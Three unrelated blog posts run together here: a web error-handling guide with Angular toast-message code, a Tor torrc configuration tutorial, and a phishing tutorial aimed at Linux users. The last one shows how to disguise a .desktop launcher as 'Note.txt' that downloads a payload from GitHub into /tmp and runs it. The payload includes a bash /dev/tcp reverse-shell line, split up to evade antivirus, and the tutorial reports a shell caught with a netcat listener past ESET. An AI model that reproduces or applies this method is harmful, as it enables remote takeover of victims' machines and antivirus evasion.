I decided to focus this article on Error handling because it is a very common security problem if it is not handled properly. This topic is very tightly coupled with logging, but for this article, I will just cover error handling.

I saw on many websites that error messages presented to the user (in this case, me) need to be handled properly so they don’t reveal implementation details. You are familiar with the fact that hackers will look deeply into these messages because they know that if they contain information that should not be revealed, they could help them and be like little clues made out of exploitable pieces. 

The most common errors I have seen were detailed internal error messages which are displayed for the user, even sometimes as toast messages.

Why are internal errors presented to the users? 

The first problem is always the lack of documentation for the web application. By that, I mean that often due to the time deadlines when setting up the architecture creating the documentation ends up being somewhat neglected. 

Also, logging is often implemented as the last step when setting up the architecture or even after some basic functional code is written. And then, with the lack of documentation about error handling, developers often try to follow the steps of the error handling code they find in the application without any consistent guidance. And in the end, you get messy code, poorly implemented error handling, and exposed data that should not be revealed!

Where should errors be handled in the web application?

First, in the mentioned documentation for the web application. There should be defined a policy that will define which types of errors should be handled, what messages should be presented to the user, and what information should be logged.

You can choose where you should handle the errors. It would be eighter on the server side, on the client side, or even both. 

*In my practice, I handled the server errors in the API and sent the proper user message to the client side to be presented to the user if needed. I created a custom error handler for the client errors and presented user-friendly error messages again.

Tips for the error messages style on the client side

In this list, I will focus just on the error messages style, which will be presented for the user eighter they are created on the client side or the server side and sent to the client side.

• Error and warning messages should be short and use clear and simple language (don’t use technical language). They should provide a short explanation why the problem is occurring and how to fix it (if it is feasible). In short- give direction to the user.

• Error message images should be applied differently for different scenarios broken, not found, construction, access rights, and other errors.

• By broken I mean when the Error is 500 when you can not launch some content or load it. Not found I mean when you get 400 error, or the page is not loading. By construction when it is planned site maintenance or some sync of the data. When other errors occur such as some action is not completed successfully you can implement basic toast message with red color. You can also use toast messages when there are some background errors.

• They can be modified as you wish, they can be closed after the user decides to close them or they can disappear after some time (delay).

• Don’t use uppercase text

• Put the error message in the proper place. For example, if you have validation error messages for fields in form, place them so it is easy to understand which message is for each field.

Useful links for error handling:

• Error handling in JavaScript

• Guideline for Error handling in Java

• Error handling in ASP.NET Core

• Error handling cheat sheet OWASP

• ASP NET Error handling

• Error handling in API Management policies

• Handle errors and exceptions in MSAL.NET

How to implement toast messages on the client side?

I will explain how to implement and use toast service on the client side, in this example, using Angular 13.

We want to catch and show error messages in two cases, one is when they get from HTTP response and the second one is when we decide to show them because of failure on the client side.

We need first to download ngx-toastr module by running npm i ngx-toastr. You can check out more about ngx toastr on their GitHub. On the site, you can follow the instructions on how to implement it so you can use it in code: add CSS, add ToastrModule (and BrowserAnimationsModule).

To show all error messages we are receiving from the server side, we need to intercept them from HTTP response. In this case we can create and use a custom HTTP interceptor class and implement in it toast service.

@Injectable()
export class CustomHttpInterceptor implements HttpInterceptor {
 
     constructor(private spinnerService: SpinnerService, private toastrService: ToastrService) { }
 
    intercept(req: HttpRequest, next: HttpHandler): Observable<HttpEvent> {
 
        this.spinnerService.show();
 
        return next.handle(req)
             .pipe(tap((event: HttpEvent) => {
                    if (event instanceof HttpResponse) {
                        this.spinnerService.hide();
                    }
                }, (error) => {
                    if(error.status == 400) {
                        this.toastrService.error("Warning", error.error.Error)
                    } else if(error.status == 500){
                        this.toastrService.error("System error is occured");
                    }
                    this.spinnerService.hide();
                }));
    }
}

In the first example you will see how and when we are catching errors and how we will present them to the user to be user-friendly.

  update(category: CategoryDetail) {
    this.subsink.sink = this.categoryService
      .update(category.id, category)
      .subscribe((data) => {
        if (data != null && data.error) {
          this.toastrService.error("Update failed", data.error);
        } else {
          this.toastrService.success("Update was successful");
          this.loadCategories();
        }
        this._spinnerService.hide();
        this.loadCategories();
      });
  }

In the second example, you will see how to handle errors when getting the response for update functionality.

As you can see, you can easily use ngx-toastr!

How to handle errors on the server side?

As I mentioned it is very important for you are handling errors on the server side as well. You are also creating users error messages. 

I will give you just the direction on where to look and how to handle errors in ASP.NET Core 6.

When you check it out, you will see the example using interface IActionResult when sending back the response, where to register Exception Handling Middleware instances, how to create HttpResponseException by extending Exception, how to create an action filer HttpResponseExceptionFilter, etc.

Conclusion

As I mentioned before, error handling goes side by side with logging. Logging is a large topic that needs its own “space,” so it will be covered in the future. There is plenty of documentation on the internet for error handling based on different technologies. But most important is the documentation about it when you decide on the architecture you are going to use.

Also very important is the testing part of the development and also after, because hackers are going to test very uncommon cases to try to invoke errors that you didn’t have in mind to handle them.

Good luck in catching errors!

Cover photo by Eric Mclean!

#error_handling #error_messages

Default configuration should be what you’re using for a while, at least before familiarizing yourself a bit more intimately with the Tor documentation. However, aside from the GUI-based set up of the browser, I want to try and explain how you would set your Tor browser through the Torrc config file.

I will assume you’re more than familiar with Tor, or have gone through the docs, and that you know what’s the purpose of the Torrc file. 

You can find your torrc file in the \Tor Browser\Browser\TorBrowser\Data\Tor path, where Tor Browser is the Tor’s installation folder.

It would look something like this (on a Windows-based machine)

On your Mac, you need to go to the Application and right-click on the Tor browser app icon, selecting the show package contents and navigate to TorBrowser/Data/Tor/Torrc.

On Linux, the file will be in the TorBrowser/Data/Tor path and Tor will also put it into /usr/local/etc/tor/torrc if compiled from source, or in the etc/tor/torrc or etc/torrc if installed as a package.

Check out the manual at this link. You will see a detailed list of options used in the torrc file. You can also do man tor, you can also check out the sample torrc file. This is good to check out since it has a lot of comments.

One of the main things people tend to change are the entry and/or exit nodes – thus changing the geographical location of the said nodes and is a good simple example for us here.

Check ExcludeNodes node,node,…

And you will notice that country codes are 2-letter ISO3166 codes and that they must be enclosed by braces. So, something like {fr} is a valid country code and would set your entry/exit node to France. Note that the country codes are not case-sensitive. And also keep in mind that {??} exists for nodes whose country can’t be identified. More about that can be found at the Tor manual link above.

I’ve now added entry/exit nodes to the torrc file:

As shown in the image above, I want to start the Tor circuit in France, and I want to exit in Great Britain.

I searched for Google.com…

And, as you can see, the change made to the torrc file has been applied. If I click on new circuit for this site:

You will note that the entry and exit nodes stayed on the same countries that were previously specified in the torrc file.

You can also specify actual relays that you want to use. Go to https://metrics.torproject.org/ and and do a relay search (bottom of the page) for a relay of your choosing. (I chose top relays options just to quickly demonstrate how you would add a relay to the torrc file)

Another important thing are the flags, they will usually tell you what’s the best use of a given relay. If its fast, suitable for entry/exit, if it is validated, and more.

If I were to pick the first relay (xor) I would copy paste the fingerprint into my torrc file

All of this depends on your risks, rather who is your adversary. For example, if they are outside those relays (and you know that) then the relay might help you stay hidden, but nothing is given. If they control the relays… well, then they might be onto you and it’s time to adapt your tactics.

One more thing, unless you’re a seasoned veteran, maybe refrain from manually changing the circuits because this can make you stand out in theory so maybe don’t do that unless you’re sure.

To apply the configuration from the newly-changed torrc file, restart the browser. You can also do pkill -sighup tor on Linux, but it might even be easier (and better) to just restart the browser.

Conclusion

Okay, this was a very short intro to the torrc but I hope you liked it and that you will find the links I shared useful! The saga continues, as I will be publishing another Tor piece shortly…

Stay tuned!

Cover image by Sandeep Swarnkar

#tor_browser #torrc

Introduction

All the phishing campaigns that attackers perform are on windows users and that’s normal as Windows widely used operating system. But, we will see how to perform phishing on Linuxusers effectively & undetectable through the .desktop "Desktop Entry" file and deliver our payload through trusted websites such as (Github&Gitlab). Also, We will run our Destop Entry on Ubuntu machine and the Eset nod32 Anti-Virus is installed & running.

What is .desktop “Desktop Entry” file ?

Basically, .desktop file is like a shortcut file in windows for Linux , Therefore, you can use it to indicate to an application and once the .desktop file executed it will run the application that the file points to it. Now, We can create a custom .desktop file and make it indicate to the /bin/sh which is the Linux shell and execute commands to download the payload, or just connect out the target to our server & receive a shell.

Desktop Entry Basics

We gonna cover some basic syntax and don’t worry it’s not complicated at all & it’s very simple. So, as any code you have to define the start point in the file and we doing it using [Desktop Entry] as the first line into the file (You can create a file and name it name.desktop and start writing into it) . The Desktop Entry files syntax basically can be considered as a key & value (e.x:Name=AppName "Key=Value" ). The Key is defined before in the Desktop Entry syntax and each one has a specific role & the value is given by the user.

Now, let’s discover the Keys:

Name: Set the name of the file.

Type: The type of the Desktop Entry (The file type could be 3 things Application,LinkandDirectory)

each Type of a Desktop Entry takes different Keys. The Application takes a path to the program will be run, Also it can carry arguments related to the program (e.x:/bin/sh -c "touch /tmp/testfile").

Version: The Version of the Entry file.

Icon: Desktop File icon to display.

Exec: The path of the program to run (including the arguments as well) .

We will not be using a lot of keys for our file. If you wanna know more keys& more details you can check it out from Here.

Now, Before we start creating our file, Let’s get our payload ready on payload ready on github.

Host the payload on github & gitlab

As github and gitlab are a trusted organization we will be able to make sure that our payload will be delivered successfully (Note:Maybe github or gitlab be blocked in some organizations "Rarely happen") . Now, i am gonna use github for explaining but at all you can use githuborgitlab. First thing is to create a new repository and give it a non-suspicious name (e.x: don’t use Myshell,Payload, reverse,bind and so on) instead use normal and known names “Not just for the repository. But, also for our payload name” and also for the file extension. As we are targeting Linux users, We can run the payload from the shell as the following ./app.ext no matter the extension is elf or whatever.

I named the repository VsocietySolution & A short description. Then, created the repository . Now, i will create a new shell file which contains some scripting codes, including bash -i >& /dev/tcp/$Nothin/$Nothing 0>&1 which basically run interactive bash shell and connect to us through the /dev/tcp (you can use udp instead of tcp) based on what type of protocols you listen on for the connection.

Here you can see the file and the code. So, what i did here is to little obfuscate in the code and it’s by sperate the words that can be detected by the anti-virus (e.x:bash,/dev/tcp or even if the AV performing some regex to detect if there is any IP address). Also, obfuscated the file name itself by changing it to access.log.

Create .desktop File

It’s the time to create our malicious .desktop file to deliver it to the victim and as we understand the syntax we will be able to create it easily. Now, create a new file and name it any.desktop. Then, open it with any text editor you have.

I named the file vsociety.desktopand as you can see it says the file is Unnamed we will now add a name for the file and the full code.

Here I made the name Note.txt, Then Exec will execute the sh Linux shell and -c argument is for command to be executed by the Linux shell. So, the command that gonna be executed will go to tmp directory and then download our shell script using wget (wget mostly installed by default on linux systems) Then, it will give the execute permission for our file which is access.log and after that will execute it. At the last line, I choose an Icon to use. But, debian Linux actually set an icon automatically according to file name. And you can find the icon you want to set for the file in the system. Just use locate icon | grep text it will locate files/paths with the icon word and filter out the one that has the word txt.

Getting a shell

Now, we will try our malicious file on an updated ubuntu box with Eset nod32 Anti-Virus Installed and we will bypass it. First of all let’s start our netcatlistener on our Attacker box, In the shell script file we set 8080 as the connection port. So, we will start our listener on port 8080.

Our Anti-Virus is running and we will run our file.

We executed the Desktop Enry file and as the following:

As can see that our access.log file downloaded and is in the /tmp directory as we configured the command inside our .desktop file. And the file is executed successfully and we got a shell on the attacker box.

Conclusion

This was a very easy way to perform phishing on linux users easily without need to develop any malware or having ours in doing research to see an effective way without getting detected, At all you can use the same way to get a shell and after that you could upload your beacon and don’t forget to use non-suspicious names & obfuscation.

#linux #phishing #attack #tutorial